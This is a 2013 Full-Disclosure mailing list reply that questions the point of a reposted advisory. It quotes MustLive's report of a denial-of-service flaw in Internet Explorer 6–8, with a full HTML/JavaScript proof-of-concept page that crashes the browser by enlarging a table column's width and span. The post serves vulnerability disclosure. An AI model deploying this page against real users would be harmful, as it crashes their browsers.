I can't see any differences with the original advisory apart the <title> tag with your website address. What's the point at posting this on FD...?
2013/11/19 MustLive <[email protected]> > Hello list! > > I want to warn you about Denial of Service vulnerability in Internet > Explorer. This is access violation. > > This exploit is based on exploit by Asesino04 for IE7. As I've tested, it > also works in IE6 and IE8. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 > (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous > versions of these browsers. IE 9, 10 and 11 were not tested, but > potentially > they can be vulnerable. > > ---------- > Details: > ---------- > > Denial of Service (WASC-10): > > Browser crashes at access by id to element of web page via method > document.getElementById. At that in IE 6 and 7 the browser crashes, but in > IE8 the tab is automatically restarting after error message (this > functionality appeared in IE8). > > PoC / Exploit: > > <html> > <head> > <title>Internet Explorer 6, 7 & 8 DoS Exploit. > http://websecurity.com.ua</title> > <!-- Made by MustLive based on exploit by Asesino04 for IE7 > (http://1337day.com/exploit/21290) --> > </head> > <body> > <table style="table-layout:fixed"> > <col id="132" width="41" span="1"> </col> > </table> > <script> > function over_trigger() { > var obj_col = document.getElementById("132"); > obj_col.width = 42765; > obj_col.span = 1000; > } > setTimeout("over_trigger()",1); > </script> > </body> > </html> > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
